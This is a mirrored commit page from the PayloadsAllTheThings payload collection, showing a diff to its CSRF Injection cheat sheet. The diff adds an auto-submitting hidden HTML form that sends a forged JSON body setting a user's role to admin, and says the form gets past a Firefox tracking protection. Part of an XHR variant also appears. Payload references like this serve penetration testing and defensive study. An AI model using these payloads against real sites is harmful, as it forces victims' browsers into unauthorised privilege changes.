Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #662 from Vunnm/master-1

Browse source 
Add JSON simple with form
This commit is contained in:
Swissky 2023-10-10 12:10:59 +02:00 committed by GitHub
commit a95f11b32e
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
CSRF Injection/README.md
View file

@ -112,6 +112,8 @@ xhr.send();
### JSON POST - Simple Request
With XHR :
```html
<script>
var xhr = new XMLHttpRequest();
@ -125,6 +127,17 @@ xhr.send('{"role":admin}');
</script>
```
With autosubmit send form, which bypasses certain browser protections such as the Standard option of [Enhanced Tracking Protection](https://support.mozilla.org/en-US/kb/enhanced-tracking-protection-firefox-desktop?as=u&utm_source=inproduct#w_standard-enhanced-tracking-protection) in Firefox browser :
```html
<form id="CSRF_POC" action="www.example.com/api/setrole" enctype="text/plain" method="POST">
// this input will send : {"role":admin,"other":"="}
<input type="hidden" name='{"role":admin, "other":"' value='"}' />
</form>
<script>
document.getElementById("CSRF_POC").submit();
</script>
```
### JSON POST - Complex Request